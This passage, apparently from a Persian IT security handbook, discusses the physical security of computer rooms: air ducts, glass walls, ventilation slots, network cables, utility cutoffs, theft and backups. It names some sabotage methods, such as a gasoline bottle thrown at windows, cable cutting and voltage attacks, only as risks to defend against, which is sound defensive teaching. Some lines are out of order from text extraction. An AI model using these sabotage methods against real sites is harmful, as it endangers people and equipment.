‫ﻛﻪ ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﺍﻳﻤﻦ ﺍﺳﺖ ﺩﺭ ﻭﺍﻗﻊ ﻛﺎﻣ ﹰ‬
‫ﻛﻒﻫﺎﻱ ﭘﻠﻪﺍﻱ ﻭ ﺳﻘﻒﻫﺎﻱ ﻛﻮﺗﺎﻩ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺍﺩﺍﺭﻱ ﻣﺪﺭﻥ‪ ،‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺍﺗﺎﻕ ﺗﺎ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎ ﻭ ﺯﻳﺮ ﻛﻔﻬـﺎ ﻧﻤـﻲﺭﺳـﻨﺪ‪ .‬ﺍﻳـﻦ ﻧـﻮﻉ ﺳـﺎﺧﺘﻤﺎﻥﺳـﺎﺯﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﺍﺗﺎﻗﻬﺎ ﻭ ﺩﻓﺎﺗﺮ ﻣﺠﺎﻭﺭ ﺳﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻭﺭﻭﺩ ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍ‬
‫ﺍﮔﺮ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍﻳﻲ ﻛﻪ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻫﻮﺍ ﻣﻲﺭﺳﺎﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻛﺎﻓﻲ ﺑﺰﺭﮒ ﺑﺎﺷﻨﺪ‪ ،‬ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﻣﺤﻮﻃﺔ‬
‫ﻫﺮﭼﻨﺪ ﺍﻳﻤﻦ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺗﻬﻮﻳﺔ ﺯﻳﺎﺩ ﻫﻮﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﭼﻨﺪ ﻛﺎﻧﺎﻝ ﻛﻮﭼﻚ ﻳﺎ ﻳﻚ ﻛﺎﻧﺎﻝ ﺑـﺰﺭﮒ ﻛـﻪ ﺩﺍﺭﺍﻱ‬
‫ﺗﻮﺭﻱﻫﺎﻱ ﺟﻮﺵ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﺩﺭﻳﭽﻪﻫﺎﻱ ﻫﻮﺍ ﻳﺎ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﻣﻲﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺧﻴﻠﻲ ﺯﻳﺎﺩ‪ ،‬ﻣﻲﺗـﻮﺍﻥ ﺩﺭ‬
‫ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﺍﺯ ﺁﺷﻜﺎﺭﺳﺎﺯﻫﺎﻱ ﺣﺮﻛﺘﻲ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪.‬‬
‫ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺟﻠﻮﻩ ﻣﻌﻤﺎﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﺍﺕ ﺟـﺪﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﮔﺮﭼﻪ ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﻭ ﭘﻨﺠﺮﻩﻫﺎﻱ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺑﻪ ﺭﺍﺣﺘﻲ ﺷﻜﺴﺘﻪ ﻣﻲﺷﻮﻧﺪ؛ ﻳﻚ ﺁﺟﺮ ﺑﺎ ﻳﻚ ﺑﻄﺮﻱ ﺑﻨﺰﻳﻦ ﻛـﻪ ﺑـﻪ ﻃـﺮﻑ ﭘﻨﺠـﺮﻩ ﭘﺮﺗـﺎﺏ ﺷـﻮﺩ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺧﺮﺍﺑﻴﻬﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪﺍﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻤﺎﺷﺎﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﻳﻮﺍﺭ ﺷﻴﺸﻪﺍﻱ ﻳﺎ‬
‫ﭘﻨﺠﺮﻩ ﻫﺴﺘﻨﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺣﻴﺎﺗﻲ ﻣﺎﻧﻨﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻳﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍﺟﻊ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻛﺴﺐ ﻛﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺘـﻮﺍﻥ‬
‫ﺍﻃﻼﻋﺎﺕ ﭘﺸﺖ ﻳﻚ ﺻﻔﺤﺔ ﻣﺎﺕ ﺭﺍ ﺑﺎ ﺗﺤﻠﻴﻞ ﺍﻣﻮﺍﺝ ﻧﻮﺭ ﺑﺎﺯﺗﺎﺑﻲ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺩﺍﺧﻠـﻲ ﺑـﺮﺍﻱ ﺍﺗﺎﻗﻬـﺎﻳﻲ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﺍﻣﺎ ﻧﮕﻬﺒﺎﻥ ﻣﺠﺎﺯ ﺑﻪ ﻭﺭﻭﺩ ﻧﻤﻲﺑﺎﺷﺪ ﺧﻮﺏ ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺩﺭ ﺗﻤﺎﻡ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﺨﺮﻳﺐ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻑ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻻﻳﻞ ﺗﺨﺮﻳﺐ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﻧﺘﻘﺎﻡ‪ ،‬ﺁﺷﻮﺑﻬﺎ‪ ،‬ﺍﻋﺘﺼﺎﺑﺎﺕ‪ ،‬ﺑﻴﺎﻧﻴﻪﻫﺎﻱ ﺳﻴﺎﺳﻲ‬
‫ﻻ ﻫﺮ ﺑﺨﺶ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﻳﺎ ﺳﺎﺧﺘﻤﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭ ﺧﻮﺩ ﺟﺎ ﺩﺍﺩﻩ ﺍﺳﺖ‬
‫ﻭ ﻓﻜﺮﻱ‪ ،‬ﻭ ﻳﺎ ﺗﻨﻬﺎ ﺳﺮﮔﺮﻣﻲ ﺑﺮﺍﻱ ﻧﺎﺑﺨﺮﺩﺍﻥ ﺑﺎﺷﺪ‪ .‬ﺍﺻﻮ ﹰ‬
‫ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﺗﺨﺮﻳﺐ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ .‬ﺩﺭ ﻋﻤﻞ ﺑﻌﻀﻲ ﺍﺯ ﺍﻫﺪﺍﻑ ﺑﻴﺶ ﺍﺯ ﺳﺎﻳﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪.‬‬‫ﻣﻨﺎﻓﺬ ﺗﻬﻮﻳﺔ ﻫﻮﺍ‬
‫ﺳﺎﻟﻬﺎ ﻗﺒﻞ‪ ۶۰ ،‬ﺍﻳﺴﺘﮕﺎﻩﻛﺎﺭﻱ ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ )ﺩﺍﻧﺸﮕﺎﻩ ‪ ٥٧(MIT‬ﺩﺭ ﺗﻨﻬﺎ ﻳﻚ ﺑﻌﺪﺍﺯﻇﻬﺮ ﺗﻮﺳﻂ ﻳﻚ ﺩﺍﻧﺸﺠﻮ ﻛـﻪ ﻧﻮﺷـﺎﺑﻪ‪-‬‬
‫ﺍﺵ ﺭﺍ ﺩﺍﺧﻞ ﺳﻮﺭﺍﺧﻬﺎﻱ ﺗﻬﻮﻳﻪ ﻫﻮﺍﻱ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺭﻳﺨﺖ ﺧﺮﺍﺏ ﺷﺪﻧﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺍﻱ ﺷﻜﺎﻓﻬﺎﻱ ﺗﻬﻮﻳﺔ ﻫﻮﺍ ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺣﺘﻴﺎﺝ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻨﮕﻮﻧﻪ ﺗﺨﺮﻳﺒﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﻳـﻦ ﺷـﻜﺎﻓﻬﺎ ﺭﺍ‬
‫ﻣﺴﺪﻭﺩ ﻛﺮﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻭﺭﺩﻥ ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﻛﻴﺪﹰﺍ ﻣﻤﻨﻮﻉ ﻧﻤﻮﺩ‪ ،‬ﻳﺎ ﺣﻔﺎﻇـﺖ ‪ ۲۴‬ﺳـﺎﻋﺘﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ ﻣـﺄﻣﻮﺭ ﻳـﺎ‬
‫ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪.‬‬
‫‪Massachusetts Institute of Technology‬‬
‫‪57‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٢٨٥‬‬
‫ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻞ ﺯﻳﺮﺷﺒﻜﺔ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺭﺍ ﺑﺎ ﻗﻄﻊ ﺗﻨﻬﺎ ﻳﻚ ﺳﻴﻢ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳـﻴﻢﭼـﻴﻦ‬
‫ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ‪ .‬ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ‪ Ethernet‬ﺁﺳﻴﺐﭘﺬﻳﺮﺗﺮ ﻫﺴﺘﻨﺪ )ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ(‪ ،‬ﻣﺸﻜﻠﺘﺮ ﺗﺮﻣﻴﻢ ﻣـﻲﺷـﻮﻧﺪ‬
‫)ﺳﺨﺖ ﺑﻪ ﻫﻢ ﭘﻴﻮﻧﺪ ﻣﻲﺧﻮﺭﻧﺪ(‪ ،‬ﻭ ﺍﻫﺪﺍﻑ ﺟﺬﺍﺑﺘﺮﻱ ﻫﺴﺘﻨﺪ )ﻣﻌﻤﻮ ﹰﻻ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺗﺒﺎﺩﻝ ﻣﻲﻛﻨﻨﺪ(‪.‬‬
‫ﻻ ﺍﺯ ﻛﺎﺑﻞﻛﺸﻲﻫﺎﻱ "ﻣﻮﻗﺖ" ﺩﺭ ﺗﺄﺳﻴﺴﺎﺕ‪ ،‬ﺑﺼﻮﺭﺕ ﺩﺍﺋﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﭘﺲ ﻭﻗﺖ ﻭ ﺗﻼﺵ ﺑﻴﺸﺘﺮﻱ ﺻﺮﻑ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺑﺘﺪﺍ ﻛﺎﺑﻞ ﺭﺍ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻧﺼﺐ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﺍﺯ ﻣﺤﻠﻬﺎﻱ ﻭﺍﺟـﺪ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ ﻋﺒﻮﺭ ﺩﻫﻴﻢ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Ethernet‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﻴﺎﻥ ﻣﺠﺎﺭﻱ ﻓﻮﻻﺩﻱ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺷﻴﻮﻩ ﻋﻼﻭﻩ ﺑﺮ ﺣﻔﺎﻇـﺖ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﻌﻀﻲ ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻧﻴﺰ ﻛﺎﺭﺳﺎﺯ ﺍﺳﺖ‪ ،‬ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺑﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻭﻗـﻮﻉ ﻳـﻚ‬
‫ﺁﺗﺶﺳﻮﺯﻱ ﻛﻮﭼﻚ ﻫﻢ ﺣﻔﻆ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻛﺴﻲ ﺭﻭﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﻬﺎ ﺷﻜﺴﺘﮕﻲﻫﺎﻱ ﻛﻮﭼﻚ ﺭﺥ ﺩﻫـﺪ‪.‬‬
‫ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﻚ ﺷﻜﺴﺘﮕﻲ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﻣﺸﻜﻞ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺍﺛﺮﻱ ﺍﺯ ﺁﻥ ﺩﺭ ﺭﻭﻛﺶ ﻛﺎﺑﻞ ﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺗﺄﺳﻴﺴﺎﺕ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺍﺯ ﻛﺎﻧﺎﻟﻬﺎﻱ ﺩﻭ ﺟﺪﺍﺭﺓ ﺣﻔﺎﻅﺩﺍﺭ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﻻﻳﻪﻫﺎﻱ ﺁﻥ ﮔﺎ ﹺﺯ ﻓﺸﺮﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﻓﺸﺎﺭ ﺩﺭﻭﻥ ﺟﺪﺍﺭﻩﻫﺎ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻓﺸﺎﺭﻳﺎﺏﻫﺎﻱ ﻛﺎﻧﺎﻝ ﺗﺮﺍﻓﻴﻚ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺧﻄﻮﻁ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺯﻧﮓ ﺧﻄﺮ ﺭﺍ ﺑﻪ ﺻﺪﺍ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﻼ ﺷﺨﺼﻲ ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﻛﺎﻧﺎﻝ ﻣﻨﻔﺬ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪.‬‬
‫ﺍﻳﻨﺤﺎﻟﺖ ﻭﻗﺘﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﺜ ﹰ‬
‫ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺑﺮﻳﺪﻥ ﻳﻚ ﻛﺎﺑﻞ‪ ،‬ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﻪ ﻳﻚ ﭘﺎﻳﺎﻧﺔ ﺷﺒﻜﻪ ‪ -‬ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ ‪ -‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻕ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ‬
‫ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻳﺎ ﺷﺒﻜﻪ ﺭﺍ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﻛﻨﺪ‪ .‬ﻫﻤﺔ ﺷﺒﻜﻪﻫﺎﻱ ﻛﺎﺑﻠﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭﻟﺘﺎﮊ ﻗﻮﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﺗﺼﺎﻻﺕ ﻭﺳﺎﻳﻞ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻗﻄﻊ ﻛﺮﺩﻥ ﺑﺮﻕ‪ ،‬ﮔﺎﺯ ﻭ ﺁﺏ ‪ -‬ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺧﺎﺭﺝ ﺳﺎﺧﺘﻤﺎﻥ ‪ -‬ﺑﺮﺍﺣﺘﻲ ﻣﻴﺴﺮ ﺍﺳﺖ‪ .‬ﭼـﻮﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﺍﻧﺮﮊﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﭼﻮﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﮔﺮﻣﻜﻦﻫﺎﻱ ﮔﺎﺯﻱ ﻳﺎ ﺳﺮﺩﻛﻦﻫﺎﻱ ﺁﺑﻲ ﻭﺍﺑﺴﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻳـﻦ ﺍﻣـﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺗﺨﺮﻳﺒﮕﺮ ﻧﻘﺎﻁ ﺍﻧﺠﺎﻡ ﺣﻤﻠﺔ ﺟﺪﻳﺪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪.‬‬
‫ﺩﻓﺎﻉ ﺩﺭ ﻣﻘﺎﺑﻞ ﻋﻤﻠﻴﺎﺕ ﺟﻨﮕﻲ ﻭ ﺗﺮﻭﺭﻳﺴﺘﻲ‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ‪ -‬ﺧﺼﻮﺻﹰﺎ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ‪ -‬ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺗﺠﺮﺑﺔ ﺁﺯﺍﺭﺩﻫﻨﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺍﻣـﺎ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﻪ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺣﺴﺎﺱ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺮﺑﺎﻧﻲ ﮔﺮﺍﻥ ﺗﻤﺎﻡ ﺷﻮﺩ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ ‪ -‬ﻳﺎ ﺑﺼﻮﺭﺕ ﺳﻴـﺴﺘﻢ ﻛﺎﻣـﻞ ﻭ ﻳـﺎ ﺍﮔـﺮ ﺳـﺎﺭﻗﺎﻥ ﺧﺒـﺮﻩ ﺑﺎﺷـﻨﺪ‬
‫ﺑﺼﻮﺭﺕ ﻗﻄﻌﺎﺕ ﻣﺠﺰﺍ‪ ،‬ﻛﻪ ﺭﺩﻳﺎﺑﻲ ﻛﺮﺩﻧﺸﺎﻥ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ‪ .‬ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ‬
‫ﻻ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺁﻥ‬
‫ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻬﻴﻪ ﻛﻨﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻫﻢ ﺑﻪ ﺧﺎﻃﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﭼﻮﻥ ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ‪ ،‬ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻓﻮﺭﻱ ﻭ ﺩﻳﺴﻜﻬﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﻧﻌﮑﺎﺳـﻲ‬
‫ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺑﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﺔ ﻧﺴﺒﺘﹰﺎ ﺳﺮﻳﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺮﺗﻴﺒﻲ ﺩﻫﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﻛـﺎﻣﭙﻴﻮﺗﺮ ﻫﻤﺰﻣـﺎﻥ‬
‫ﺭﻭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﻭﺍﻗﻊ ﺩﺭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺷﻬﺮ ﻳﺎ ﺁﻧﺴﻮﻱ ﺟﻬﺎﻥ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻫﻤﺰﻣـﺎﻥ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ‪dump‬ﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺳﺎﻋﺘﻲ ﻳﺎ ﺷﺒﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻳﻚ ﺑﻤﺒﮕﺬﺍﺭﻱ ﺍﻧﺘﺤﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺟﺎﻱ ﺩﻳﮕﺮ ﻭ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺣﻔﺎﻇﺖ ﻧﻤﻮﺩ‪.‬‬
‫‪٢٨٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
